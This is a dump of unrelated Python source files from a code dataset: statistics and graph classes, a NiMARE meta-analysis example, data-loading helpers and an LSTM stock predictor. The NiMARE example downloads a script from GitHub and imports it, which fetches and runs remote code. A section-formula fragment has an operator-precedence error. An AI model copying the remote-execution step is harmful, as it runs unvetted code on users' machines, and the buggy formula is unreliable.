(((vAR_input_m*vAR_input_x2)+(vAR_input_n*vAR_input_x1))/vAR_input_n + vAR_input_m),(((vAR_input_m*vAR_input_y2)+(vAR_input_n*vAR_input_y1))/vAR_input_n + vAR_input_m)\r\n st.success(vAR_dis)\r\n if selected == \"External Section\":\r\n vAR_dis = (((vAR_input_m*vAR_input_x2)-(vAR_input_n*vAR_input_x1))/vAR_input_n - vAR_input_m),(((vAR_input_m*vAR_input_y2)-(vAR_input_n*vAR_input_y1))/vAR_input_n - vAR_input_m)\r\n st.success(vAR_dis)\r\n else:\r\n st.error(\"Error\")\r\n with col11:\r\n st.write(\"# Result \")\r\n","sub_path":"Streamlitapp/Grade-10/source/section_formula.py","file_name":"section_formula.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"646939474","text":"\"\"\"The Cauchy distribution.\"\"\"\nimport numpy as np\nfrom distribution import Distribution\nfrom recurrence_utils import custom_recurrence_coefficients\n\nclass Cauchy(Distribution):\n \"\"\"\n The class defines a Cauchy object. 
It is the child of Distribution.\n \n :param double location:\n\t\tLocation parameter of the Cauchy distribution.\n :param double scale:\n\t\tScale parameter of the Cauchy distribution.\n \"\"\"\n def __init__(self, location=None, scale=None):\n self.location = location\n self.scale = scale\n self.bounds = np.array([-np.inf, np.inf])\n self.mean = np.nan\n self.variance = np.nan\n self.skewness = np.nan\n self.kurtosis = np.nan\n \n def getDescription(self):\n \"\"\"\n A description of the Cauchy distribution.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :return:\n A string describing the Cauchy distribution.\n \"\"\"\n text = \"A Cauchy distribution has an undefined mean and variance; its location parameter is \"+str(self.location)+\", and its scale parameter is \"+str(self.scale)+\".\"\n return text\n \n def getPDF(self, N=None, points=None):\n \"\"\"\n A Cauchy probability density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param int N:\n Number of points for defining the probability density function.\n :return:\n An array of N equidistant values over the support of the distribution.\n :return:\n Probability density values along the support of the Cauchy distribution.\n \"\"\"\n if N is not None:\n x = np.linspace(-15*self.scale, 15*self.scale, N)\n x = x + self.location\n w = 1.0/(np.pi * self.scale * (1 + ((x - self.location)/(self.scale))**2) )\n return x, w\n elif points is not None:\n w = 1.0/(np.pi * self.scale * (1 + ((points - self.location)/(self.scale))**2) )\n return w\n else:\n raise ValueError('Please provide an input for the getPDF method')\n\n\n def getCDF(self, N=None, points=None):\n \"\"\"\n A Cauchy cumulative density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param integer N:\n Number of points for defining the cumulative density function.\n :return:\n An array of N equidistant values over the support of the distribution.\n :return:\n Cumulative density values along the support of the Cauchy distribution.\n \"\"\"\n if N is not None:\n x = np.linspace(-15*self.scale, 15*self.scale, N)\n x = x + self.location\n w = 1.0/np.pi * np.arctan((x - self.location) / self.scale) + 0.5\n return x, w\n elif points is not None:\n w = 1.0/np.pi * np.arctan((points - self.location) / self.scale) + 0.5\n return w\n else:\n raise ValueError('Please provide an input for the getCDF method')\n\n def getiCDF(self, xx):\n \"\"\"\n An inverse Cauchy cumulative density function.\n \n :param Cauchy self:\n An instance of the Cauchy class.\n :param array xx:\n A numpy array of uniformly distributed samples between [0, 1].\n :return:\n Inverse CDF samples associated with the Cauchy distribution.\n \"\"\"\n return self.location + self.scale * np.tan(np.pi * (xx - 0.5))\n\n","sub_path":"equadratures/distributions/cauchy.py","file_name":"cauchy.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"577915015","text":"# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\n\n.. _metas3:\n\n========================================================\n Run image-based meta-analyses on 21 pain studies\n========================================================\n\nCollection of NIDM-Results packs downloaded from Neurovault collection 1425,\nuploaded by Dr. 
Camille Maumet.\n\n..note::\n This will likely change as we work to shift database querying to a remote\n database, rather than handling it locally with NiMARE.\n\n\"\"\"\n###############################################################################\n# Start with the necessary imports\n# --------------------------------\nimport json\nimport numpy as np\nfrom glob import glob\nfrom os.path import basename, join, dirname, isfile\nimport urllib.request\nimport os\n\nimport pandas as pd\nimport nibabel as nib\nfrom scipy.stats import t\nfrom nilearn.masking import apply_mask\nfrom nilearn.plotting import plot_stat_map\n\nimport nimare\nfrom nimare.meta.ibma import (stouffers, fishers, weighted_stouffers,\n rfx_glm, ffx_glm)\n\n###############################################################################\n# Download data\n# --------------------------------\nurl = \"https://raw.githubusercontent.com/tsalo/NiMARE/coco2019/download_test_data.py\"\nu = urllib.request.urlopen(url)\ndata = u.read()\nu.close()\n\n# write python to file\nwith open(\"download_test_data.py\", \"wb\") as f:\n f.write(data)\n\n# download the requisite data\nfrom download_test_data import download_dataset\ndownload_dataset()\nos.remove(\"download_test_data.py\")\n\n###############################################################################\n# Load Dataset\n# --------------------------------------------------\ndset_file = join(dirname(nimare.__file__), 'tests', 'data', 'nidm_pain_dset.json')\nwith open(dset_file, 'r') as fo:\n dset_dict = json.load(fo)\ndset = nimare.dataset.Dataset(dset_file)\n\nmask_img = dset.mask\n\nlogp_thresh = -np.log(.05)\n\n###############################################################################\n# Define functions for querying set of NIDM-Results packs\n# -------------------------------------------------------\ndef _get_file(cdict, t):\n \"\"\"Return the file associated with a given data type within a\n folder if it exists. Otherwise, returns an empty list.\n \"\"\"\n temp = ''\n if t == 'con':\n temp = cdict['images'].get('con')\n elif t == 'se':\n temp = cdict['images'].get('se')\n elif t == 't':\n temp = cdict['images'].get('t')\n elif t == 'z':\n temp = cdict['images'].get('z')\n elif t == 'n':\n temp = cdict.get('sample_sizes', [])\n if temp:\n temp = np.mean(temp)\n else:\n raise Exception('Input type \"{0}\" not recognized.'.format(t))\n\n return temp\n\n\ndef get_files(ddict, types):\n \"\"\"Returns a list of files associated with a given data type\n from a set of subfolders within a directory. 
Allows for\n multiple data types and only returns a set of files from folders\n with all of the requested types.\n \"\"\"\n all_files = []\n for study in ddict.keys():\n files = []\n cdict = ddict[study]['contrasts']['1']\n for t in types:\n temp = _get_file(cdict, t)\n if temp:\n files.append(temp)\n\n if len(files) == len(types):\n all_files.append(files)\n all_files = list(map(list, zip(*all_files)))\n return all_files\n\n###############################################################################\n# Get z-maps\n# --------------------------------------------------\nfiles = get_files(dset_dict, ['z'])\nz_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in files[0]]\nz_data = apply_mask(z_imgs, mask_img)\nprint('{0} studies found.'.format(z_data.shape[0]))\n\n###############################################################################\n# Fisher's\n# --------------------------------------------------\nresult = fishers(z_data, mask_img)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with fixed-effects inference\n# --------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='ffx',\n null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with random-effects inference using theoretical null distribution\n# -----------------------------------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='rfx',\n null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Stouffer's with random-effects inference using empirical null distribution\n# -----------------------------------------------------------------------------\nresult = stouffers(z_data, mask_img, inference='rfx',\n null='empirical', n_iters=1000)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Get z-maps + sample sizes\n# --------------------------------------------------\nz_files, ns = get_files(dset_dict, ['z', 'n'])\nz_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in z_files]\nz_data = apply_mask(z_imgs, mask_img)\nsample_sizes = np.array(ns)\nprint('{0} studies found.'.format(z_data.shape[0]))\n\n###############################################################################\n# Weighted Stouffer's\n# -------------------\nresult = weighted_stouffers(z_data, sample_sizes, mask_img)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# Get contrast maps\n# ----------------------------------------------------------------\ncon_files = get_files(dset_dict, ['con'])\ncon_files = con_files[0]\ncon_imgs = [nib.load(join(dirname(nimare.__file__), f)) for f in con_files]\ncon_data = apply_mask(con_imgs, mask_img)\nprint('{0} studies found.'.format(con_data.shape[0]))\n\n###############################################################################\n# RFX GLM with theoretical null distribution\n# 
------------------------------------------\nresult = rfx_glm(con_data, mask_img, null='theoretical', n_iters=None)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n\n###############################################################################\n# RFX GLM with empirical null distribution\n# ------------------------------------------\nresult = rfx_glm(con_data, mask_img, null='empirical', n_iters=1000)\nplot_stat_map(result.images['z'], cut_coords=[0, 0, -8],\n draw_cross=False, cmap='RdBu_r')\n","sub_path":"examples/02_meta-analyses/run_ibmas.py","file_name":"run_ibmas.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109882819","text":"# -*- coding: utf-8 -*-\n'''\n@time: 2019/11/15 0015 16:15\n@author: chen\n@contact: 1171954100@qq.com\n@file: test_suite.py\n@desc:\n ┏┓   ┏┓+ +\n   ┏┛┻━━━┛┻┓ + +\n   ┃       ┃  \n   ┃   ━   ┃ ++ + + +\n   ████━████ ┃+\n   ┃       ┃ +\n   ┃   ┻   ┃\n   ┃       ┃ + +\n   ┗━┓   ┏━┛\n     ┃   ┃           \n     ┃   ┃ + + + +\n     ┃   ┃    Codes are far away from bugs with the animal protecting   \n     ┃   ┃ +     神兽保佑,代码无bug  \n     ┃   ┃\n     ┃   ┃  +         \n     ┃    ┗━━━┓ + +\n     ┃        ┣┓\n     ┃        ┏┛\n     ┗┓┓┏━┳┓┏┛ + + + +\n      ┃┫┫ ┃┫┫\n      ┗┻┛ ┗┻┛+ + + +\n\n'''\nimport unittest\nimport HTMLTestRunnerNew\nfrom Homework.homework_0321.test_case import *\n\nsuite=unittest.TestSuite() #创建一个对象\n\n#第一种方法,一个一个去添加用例\n# suite.addTest(TestAdd('test_normal_001'))\n# suite.addTest(TestAdd('test_normal_002'))\n# suite.addTest(TestAdd('test_abnormal_001'))\n# suite.addTest(TestAdd('test_abnormal_002'))\n\n#第二种方法:通过loader来加载用例 通过模块加载用例\n# from Homework.homework_0321 import test_case\n# loader=unittest.TestLoader() #用例加载器\n# suite.addTest(loader.loadTestsFromModule(test_case))\n\n#第三种方法:通过loader来加载用例,通过测试类名来加载用例\nfrom Homework.homework_0321.test_case import *\nloader=unittest.TestLoader() #用例加载器\nsuite.addTest(loader.loadTestsFromTestCase(TestAdd))\n\n# #执行用例--unittest版本\n# with open('test.txt','w',encoding='utf-8') as file:\n# runner=unittest.TextTestRunner(stream=file,verbosity=2) #创建一个对象来执行用例\n# runner.run(suite)\n\n# #执行并生成html测试报告\nwith open('test.html','wb') as file:\n runner=HTMLTestRunnerNew.HTMLTestRunner(\n stream=file,\n verbosity=2,\n title='20190321测试报告',\n description='作业03120',\n tester='chenpeng')\n\n runner.run(suite)\n","sub_path":"Homework/homework_0321/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324016773","text":"import numpy as np\nimport pandas as pd\nimport sklearn\nimport sklearn.preprocessing\nimport sklearn.decomposition\nimport sklearn.ensemble\n\n\ndef drop_correlated(train, test, threshold=1):\n train_ = train.copy(deep=True)\n train_.fillna(2)\n\n columns = []\n for i in range(332, 1332):\n columns += [\"V\" + str(i)]\n\n corr_pearson = train_[columns].corr(method=\"pearson\").values\n corr_pearson[np.diag_indices_from(corr_pearson)] = 0\n f1, f2 = np.where(np.abs(corr_pearson) > threshold)\n columns_ = np.ones(corr_pearson.shape[0])\n\n for x, y in zip(f1, f2):\n if columns_[x] and columns_[y]:\n columns_[x] = 0\n\n columns_ = list(map(lambda x: \"V\" + x, (np.where(1 - columns_)[0] + 332).astype(\"str\")))\n\n print(columns_)\n\n train.drop(columns_, axis=1, inplace=True)\n test.drop(columns_, axis=1, inplace=True)\n return train, 
test\n\n\ndef drop_features(data):\n columns = data.columns[list(map(lambda x: x[0] == \"V\" and int(x[1:]) >= 332, data.columns))]\n\n data.drop(columns, axis=1, inplace=True)\n return data\n\n\ndef add_missing_indicator(data):\n data[\"missing_sum\"] = np.sum(np.isnan(data), axis=1)\n\n return data\n\n\ndef add_allele_features(data):\n allele_columns = data.columns[list(map(lambda x: x[0] == \"V\" and int(x[1:]) >= 332, data.columns))]\n #for col_name in allele_columns:\n #data[\"A\" + col_name[1:] + \"_p(1-p)\"] = data[col_name]*(1 - data[col_name])\n #data[\"A\" + col_name[1:] + \"_1-p\"] = 1 - data[col_name]\n\n return data\n\n\ndef add_features(data):\n data = add_missing_indicator(data)\n data = add_allele_features(data)\n return data\n\n\ndef pca_features(train, test, n_components=2):\n train_ = train.copy(deep=True)\n test_ = test.copy(deep=True)\n\n train_.fillna(-1, inplace=True)\n test_.fillna(-1, inplace=True)\n\n pca = sklearn.decomposition.PCA(n_components=n_components)\n train_pca = pca.fit_transform(train_)\n test_pca = pca.transform(test_)\n \n return train_pca, test_pca\n\ndef input_missing(train, test):\n\n imp = sklearn.preprocessing.Imputer()\n train = imp.fit_transform(train)\n test = imp.transform(test)\n\n return train, test\n\n\ndef scale_data(train, test):\n scaler = sklearn.preprocessing.StandardScaler()\n train = scaler.fit_transform(train)\n test = scaler.transform(test)\n\n return train, test\n\n\ndef shuffle_train(train, target):\n idx = np.arange(len(train))\n np.random.seed(1234)\n np.random.shuffle(idx)\n train = train.iloc[idx]\n target = target[idx]\n\n return train, target\n\n\ndef do_one_hot(train_, test_):\n data_types = pd.read_csv(\"input/MetaData.csv\")\n cat_columns = data_types[np.logical_or((data_types[\"Column Type\"] == \"Category\"),\n (data_types[\"Column Type\"] == \"Ordered Category\"))][\"varnum\"].values\n\n train = train_.copy(deep=True)\n test = test_.copy(deep=True)\n\n train.fillna(12345, inplace=True)\n test.fillna(12345, inplace=True)\n\n\n le = sklearn.preprocessing.LabelEncoder()\n train_cat = le.fit_transform(train[cat_columns[0]].values)\n test_cat = le.fit_transform(test[cat_columns[0]].values)\n for i in range(1, len(cat_columns)):\n le.fit((np.concatenate((train[cat_columns[i]], test[cat_columns[i]]))))\n train_cat = np.column_stack((train_cat, le.transform(train[cat_columns[i]].values)))\n test_cat = np.column_stack((test_cat, le.transform(test[cat_columns[i]].values)))\n\n ohe = sklearn.preprocessing.OneHotEncoder(sparse=False)\n ohe.fit(np.concatenate((train_cat, test_cat)))\n train_cat = ohe.transform(train_cat)\n test_cat = ohe.transform(test_cat)\n\n return train_cat, test_cat\n\n\ndef take_important(train, target, test, threshold=0.001):\n model = sklearn.ensemble.RandomForestClassifier(n_estimators=2000, max_depth=8, criterion=\"entropy\", bootstrap=False,\n min_samples_leaf=4, min_samples_split=2, random_state=1234)\n\n model.fit(train, target)\n importance = model.feature_importances_\n print(np.sum(importance > 0.001))\n\n return train[:, importance > 0.001], test[:, importance > 0.001]\n\ndef preprocess_data(train, test, target):\n train, target = shuffle_train(train, target)\n\n train = add_features(train)\n test = add_features(test)\n\n train_cat, test_cat = do_one_hot(train, test)\n train_pca, test_pca = pca_features(train, test, n_components=16)\n\n train = drop_features(train)\n test = drop_features(test)\n\n train, test = input_missing(train, test)\n train, test = scale_data(train, test)\n\n train = 
np.column_stack((train, train_cat))\n test = np.column_stack((test, test_cat))\n\n train = np.column_stack((train, train_pca))\n test = np.column_stack((test, test_pca))\n\n train, test = take_important(train, target, test)\n\n return train, test, target\n","sub_path":"contests/SHAD Spring 2/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"14787500","text":"def maximo(a,b,c):\n if a > b:\n if a > c:\n return a\n else:\n return c\n else:\n if b > c:\n return b\n else:\n return c\n\ndef test_func0():\n assert maximo(30,14,10) == 30\n\ndef test_func1():\n assert maximo(0,-1,1) == 1","sub_path":"S5/S5-TE2.py","file_name":"S5-TE2.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599190303","text":"import os\nimport torch\n\nfrom torch_geometric.datasets import ModelNet\nfrom torch_geometric.transforms import SamplePoints, NormalizeScale, RandomFlip, RandomRotate, Compose, KNNGraph\n\n\ndef get_dataset(root, transform, pre_transform):\n train_valid_dataset = ModelNet(root=root, name=\"10\", train=True, pre_transform=pre_transform, transform=transform)\n test_dataset = ModelNet(root=root, name=\"10\", train=False, pre_transform=pre_transform, transform=transform)\n return train_valid_dataset, test_dataset\n\n\ndef get_split(index_file_root, dataset):\n index_file = open(index_file_root, 'r')\n train_index = []\n for idx in index_file:\n train_index.append(int(idx))\n\n return dataset[train_index]\n\n\ndef create_file_if_necessary(train_file, valid_file, dataset):\n if not os.path.isfile(train_file) and not os.path.isfile(valid_file):\n torch.manual_seed(0)\n # Shuffle before splitting data (random split)\n _, perm = dataset.shuffle(return_perm=True)\n\n # Create two files with the indices od the training and validation data\n train_idx = open(train_file, 'w+')\n valid_idx = open(valid_file, 'w+')\n\n # Split the tensor of indices in training and validation\n train_split, val_split = perm.split(round(len(perm) * 0.8))\n\n for i in range(len(train_split)):\n train_idx.writelines(str(train_split[i].item()) + \"\\n\")\n for i in range(len(val_split)):\n valid_idx.writelines(str(val_split[i].item()) + \"\\n\")\n\n train_idx.close()\n valid_idx.close()\n\n elif not os.path.isfile(train_file) or not os.path.isfile(valid_file):\n raise ValueError('One file exists and the other one does not')\n\n\ndef get_train_valid_test_ModelNet(root, num_of_points, isGraph=False, normalize_scale=True):\n dataset_root = os.path.join(root, 'ModelNet')\n train_valid_split, test_split = get_dataset(dataset_root, transform=get_transformation(isGraph, normalize_scale),\n pre_transform=get_pre_transformation(num_of_points))\n\n train_split_root = os.path.join(root, 'train_split.txt')\n valid_split_root = os.path.join(root, 'valid_split.txt')\n create_file_if_necessary(train_split_root, valid_split_root, train_valid_split)\n\n train_split = get_split(index_file_root=train_split_root, dataset=train_valid_split)\n valid_split = get_split(index_file_root=valid_split_root, dataset=train_valid_split)\n return train_split, valid_split, test_split\n\n\ndef get_transformation(normalize_scale, is_graph=False):\n if normalize_scale:\n if is_graph:\n return Compose([NormalizeScale(), KNNGraph(k=9, loop=True, force_undirected=True)])\n else:\n return NormalizeScale()\n else:\n return 
None\n\n\ndef get_pre_transformation(number_points=1024):\n return SamplePoints(num=number_points)\n\n\ndef get_random_flip(axis=1, p=0.5):\n return RandomFlip(axis, p)\n\n\ndef get_random_rotation(degrees=45, axis=1):\n return RandomRotate(degrees, axis)\n\n\ndef data_augmentation_flip(normalize_scale, is_graph, axis=1, p=0.5):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_flip(axis, p)])\n\n\ndef data_augmentation_rotation(normalize_scale, is_graph, axis=1, degrees=45):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_rotation(axis=axis, degrees=degrees)])\n\n\ndef data_augmentation_flip_rotation(normalize_scale, is_graph, axis_flip=1, p=0.5, axis_rotation=1, degrees=45):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_flip(axis_flip, p),\n get_random_rotation(axis=axis_rotation, degrees=degrees)])\n\n\ndef get_data_augmentation(dataset, transformation, is_graph, normalize_scale, axis_flip=1, p=0.5, axis_rotation=1, degrees=45):\n if transformation is not None:\n if transformation.lower() == 'flip_rotation':\n dataset.transform = data_augmentation_flip_rotation(normalize_scale, is_graph, axis_flip, p, axis_rotation, degrees)\n elif transformation.lower() == 'flip':\n dataset.transform = data_augmentation_flip(normalize_scale, is_graph, axis=axis_flip, p=p)\n elif transformation.lower() == 'rotate':\n dataset.transform = data_augmentation_rotation(normalize_scale, is_graph, axis=axis_rotation, degrees=degrees)\n else:\n raise ValueError(\"data augmentation bad introduced\")\n","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643590932","text":"class MyGraph:\n\n def __init__(self, g={}):\n self.g = g\n\n def size(self):\n return len(self.get_nodes()), len(self.get_edges())\n\n def print_graph(self):\n [print (node, \" --> \" ,self.g[node]) for node in self.g.keys()]\n\n def get_nodes(self):\n return list(self.g.keys())\n\n def get_edges(self):\n return [(o, d) for o, nodes_dest in self.g.items() for d in nodes_dest]\n\n def add_node(self, node):\n if node not in self.g.keys():\n self.g[node]=[]\n\n def add_edge(self, orig, dest):\n if orig not in self.g.keys():\n self.add_node(orig)\n if dest not in self.g.keys():\n self.add_node(dest)\n if dest not in self.g[orig]:\n self.g[orig].append(dest)\n\n def get_successors(self, node):\n return list(self.g[node])\n\n def get_predecessors(self, node):\n return [node_orig for node_orig, nodes_dest in self.g.items() if node in nodes_dest]\n\n def get_adjacents(self, node):\n s = self.get_successors(node)\n p = self.get_predecessors(node)\n return list(set(s+p))\n\n def out_degree(self, node):\n return len(self.g[node])\n\n def in_degree(self, node):\n return len(self.get_predecessors(node))\n\n def degree(self, node):\n return len(self.get_adjacents(node))\n\n def reachableBFS (self, node):\n to_visit = [node]\n res=[]\n while to_visit:\n actual_node = to_visit.pop(0) #index required to remove the first element of the list\n if node!= actual_node : res.append(actual_node)\n to_visit.extend([elem for elem in self.g[actual_node] if elem not in res and elem not in to_visit])\n return res\n\n def reachableDFS (self, node):\n to_visit = [node]\n res = []\n while to_visit:\n actual_node = to_visit.pop(0)\n if node!= actual_node : res.append(actual_node)\n aux = [elem for elem in self.g[actual_node] if elem not in res and 
elem not in to_visit]\n to_visit = aux + to_visit\n return res\n\n\n def distance(self, orig, dest):\n if orig == dest: return 0\n l = [(orig, 0)]\n visited = [orig]\n while l:\n actual_node, dist = l.pop(0)\n for elem in self.g[actual_node]:\n if elem == dest:\n return dist + 1\n elif elem not in visited:\n l.append((elem, dist + 1))\n visited.append(elem)\n return float(\"inf\")\n\n\n def shortest_path(self, orig, dest):\n if orig == dest: return []\n l = [(orig, [])]\n visited = []\n while l:\n actual_node, path = l.pop(0)\n for elem in self.g[actual_node]:\n if elem == dest:\n return [orig] + path + [elem]\n elif elem not in visited:\n l.append((elem, path + [elem]))\n visited.append(elem)\n return None\n\n\n def reachable_with_dist(self, node):\n res = []\n l = [(node, 0)]\n while len(l) > 0:\n actual_node, dist = l.pop(0)\n if actual_node != node: res.append((actual_node, dist))\n for elem in self.g[actual_node]:\n if elem not in [x[0] for x in l + res]:\n l.append((elem, dist + 1))\n return res\n\n def node_has_cycle (self, node):\n l = [node]\n res = False\n visited = [node]\n while l:\n actual_node = l.pop()\n for elem in self.g[actual_node]:\n if elem == node: return True\n elif elem not in visited:\n l.append(elem)\n visited.append(elem)\n return res\n\n def has_cycle(self):\n for v in self.g.keys():\n if self.node_has_cycle(v): return True\n return False\n\n #aula 3\n #########################################\n def all_degrees(self, deg_type = \"inout\"):\n degs = {v: len(self.g[v]) if (deg_type == \"out\" or deg_type == \"inout\") else 0 for v in self.g.keys()}\n\n if deg_type == \"in\" or deg_type == \"inout\":\n for v in self.g.keys():\n for d in self.g[v]:\n if deg_type == \"in\" or v not in self.g[d]:\n degs[d] += 1\n return degs\n\n def mean_degree (self, deg_type = \"inout\"):\n degrees = self.all_degrees(deg_type)\n return sum(degrees.values()) / float(len(degrees))\n\n def prob_degree (self, deg_type = \"inout\"):\n degrees = self.all_degrees(deg_type)\n res={}\n for node in degrees:\n k = degrees[node]\n res[k] = 1 if k not in res.keys() else res[k]+1\n return {k: val/len(degrees) for k,val in res.items()}\n\n\n def mean_distances(self):\n tot = 0\n num_reachable = 0\n for k in self.g.keys():\n distsk = self.reachable_with_dist(k)\n for _, dist in distsk:\n tot += dist\n num_reachable += len(distsk)\n meandist = float(tot) / num_reachable\n n = len(self.get_nodes())\n return meandist, float(num_reachable) / ((n - 1) * n)\n\n def clustering_coef(self, v):\n adjs = self.get_adjacents(v)\n if len(adjs) == 0: return 0\n if len(adjs) == 1: return 1.0\n ligs = 0\n for i in range(0, len(adjs)):\n for j in range(i+1, len(adjs)):\n n1 = adjs[i]\n n2 = adjs[j]\n if n1 in self.g[n2] or n2 in self.g[n1]:\n ligs += 1\n return float(ligs) / ((len(adjs) * (len(adjs) - 1))/2)\n\n def all_clustering_coefs(self):\n return {k:self.clustering_coef(k) for k in self.g.keys()}\n\n\n def meanClusteringCoef(self):\n ccs = self.all_clustering_coefs()\n return sum(ccs.values()) / float(len(ccs))\n\n def mean_clustering_per_deg(self, deg_type=\"inout\"):\n degs = self.all_degrees(deg_type)\n ccs = self.all_clustering_coefs()\n print(degs)\n print(ccs)\n degs_node = {}\n for n in degs.keys():\n if degs[n] in degs_node.keys():\n degs_node[degs[n]].append(n)\n else:\n degs_node[degs[n]] = [n]\n print(degs_node)\n ck = {}\n for d in degs_node.keys():\n tot = sum([ccs[node] for node in degs_node[d]])\n ck[d] = float(tot) / len(degs_node[d])\n return ck\n\n # AULA 4\n #\n def check_balanced_node(self, 
node):\n pass\n\t\t\n def check_balanced_graph(self):\n pass\n\n #ciclo euleriano\n\n def eulerian_cycle(self):\n pass\n\n def check_nearly_balanced_graph(self):\n pass\n\t\t\n def eulerian_path(self):\n pass\n\n # caminhos Hamiltonianos\n def check_is_valid_path(self, path):\n pass\n\n def check_is_hamiltonian_path(self, path):\n pass\n\n def search_hamiltonian_path_from_node(self, node):\n pass\n\t\t\n def search_hamiltonian_path(self):\n pass\n\n","sub_path":"TP1/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545756389","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom sklearn.model_selection import train_test_split\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras.layers import LSTM\n\ndef jonkmokPredict(jonkmokname):\n df_price = pd.read_csv('../pyth onProject4/주가 데이터 5년_학습용/ARIRANG 200선물레버리지_수정주가.csv', encoding='euc-kr', index_col = 0)\n df_price['날짜'] = pd.to_datetime(df_price['날짜'], format='%Y%m%d')\n df_price['연도'] =df_price['날짜'].dt.year\n df_price['월'] =df_price['날짜'].dt.month\n df_price['일'] =df_price['날짜'].dt.day\n # print(df_price.describe())\n # print(df_price.head())\n\n df = df_price.loc[df_price['연도']>=1990]\n\n # plt.figure(figsize=(16, 9))\n # sns.lineplot(y=df['종가'], x=df['날짜'])\n # plt.xlabel('time')\n # plt.ylabel('price')\n # plt.show()\n\n scaler = MinMaxScaler()\n scale_cols = ['시가', '고가', '저가', '종가', '거래량']\n df_scaled = scaler.fit_transform(df[scale_cols])\n\n df_scaled = pd.DataFrame(df_scaled)\n df_scaled.columns = scale_cols\n\n # print(df_scaled)\n\n TEST_SIZE = 200\n\n train = df_scaled[:-TEST_SIZE]\n test = df_scaled[-TEST_SIZE:]\n\n def make_dataset(data, label, window_size=30):\n feature_list = []\n label_list = []\n for i in range(len(data) - window_size):\n feature_list.append(np.array(data.iloc[i:i+window_size]))\n label_list.append(np.array(label.iloc[i+window_size]))\n return np.array(feature_list), np.array(label_list)\n\n feature_cols = ['시가', '고가', '저가', '거래량']\n label_cols = ['종가']\n\n train_feature = train[feature_cols]\n train_label = train[label_cols]\n\n test_feature = test[feature_cols]\n test_label = test[label_cols]\n\n # train dataset\n train_feature, train_label = make_dataset(train_feature, train_label, 20)\n\n # train, validation set 생성\n\n x_train, x_valid, y_train, y_valid = train_test_split(train_feature, train_label, test_size=0.2)\n\n x_train.shape, x_valid.shape\n # ((6086, 20, 4), (1522, 20, 4))\n\n # test dataset (실제 예측 해볼 데이터)\n test_feature, test_label = make_dataset(test_feature, test_label, 20)\n test_feature.shape, test_label.shape\n # ((180, 20, 4), (180, 1))\n\n model = Sequential()\n model.add(LSTM(16,\n input_shape=(train_feature.shape[1], train_feature.shape[2]),\n activation='relu',\n return_sequences=False)\n )\n model.add(Dense(1))\n\n model.compile(loss='mean_squared_error', optimizer='adam')\n early_stop = EarlyStopping(monitor='val_loss', patience=5)\n filename = '{}_checkpoint.h5'.format(jonkmokname)\n checkpoint = ModelCheckpoint(filename, monitor='val_loss', verbose=1, save_best_only=True, mode='auto')\n\n history = model.fit(x_train, y_train,\n epochs=200,\n batch_size=16,\n validation_data=(x_valid, y_valid),\n 
callbacks=[early_stop, checkpoint])\n\n model.load_weights(filename)\n\n # 예측\n pred = model.predict(test_feature)\n\n # plt.figure(figsize=(12, 9))\n # plt.plot(test_label, label='actual')\n # plt.plot(pred, label='prediction')\n # plt.legend()\n # plt.show()\n\n return filename, pred[-1]\n","sub_path":"pythonProject6/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
